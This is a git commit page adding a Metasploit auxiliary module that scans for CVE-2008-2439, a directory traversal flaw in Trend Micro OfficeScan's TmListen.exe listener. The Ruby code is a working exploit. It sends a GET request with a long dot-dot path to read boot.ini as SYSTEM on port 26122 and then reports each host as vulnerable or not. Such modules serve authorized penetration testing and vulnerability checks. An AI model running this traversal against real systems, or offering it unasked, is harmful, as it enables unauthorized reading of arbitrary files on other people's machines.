Added tmlisten_traversal aux module from Anshul Pandey.
git-svn-id: file:///home/svn/framework3/trunk@6075 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
e132179b2d
commit
a2da72c0eb
|
@ -0,0 +1,66 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/projects/Framework/
|
||||
##
|
||||
|
||||
|
||||
require 'msf/core'
|
||||
|
||||
|
||||
class Metasploit3 < Msf::Auxiliary
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Auxiliary::Scanner
|
||||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'TrendMicro OfficeScanNT Listener Traversal Arbitrary File Access',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{
|
||||
This module tests for directory traversal vulnerability in the UpdateAgent
|
||||
function in the OfficeScanNT Listener (TmListen.exe) service in Trend Micro
|
||||
OfficeScan. This allows remote attackers to read arbitrary files as SYSTEM
|
||||
via dot dot sequences in a HTTP request.
|
||||
},
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '48730' ],
|
||||
[ 'CVE', '2008-2439' ],
|
||||
[ 'BID', '31531' ],
|
||||
[ 'URL', 'http://www.trendmicro.com/ftp/documentation/readme/OSCE_7.3_Win_EN_CriticalPatch_B1372_Readme.txt' ],
|
||||
],
|
||||
'Author' => [ 'Anshul Pandey <anshul999@gmail.com>', 'patrick' ],
|
||||
'License' => MSF_LICENSE
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(26122),
|
||||
], self.class)
|
||||
end
|
||||
|
||||
def run_host(target_host)
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
|
||||
'method' => 'GET',
|
||||
}, 20)
|
||||
|
||||
if (res.code >= 200)
|
||||
if (res.body =~ /boot/)
|
||||
vuln = "vulnerable."
|
||||
else
|
||||
vuln = "not vulnerable."
|
||||
end
|
||||
if (res.headers['Server'])
|
||||
print_status("http://#{target_host}:#{rport} is running #{res.headers['Server']} and is #{vuln}")
|
||||
end
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue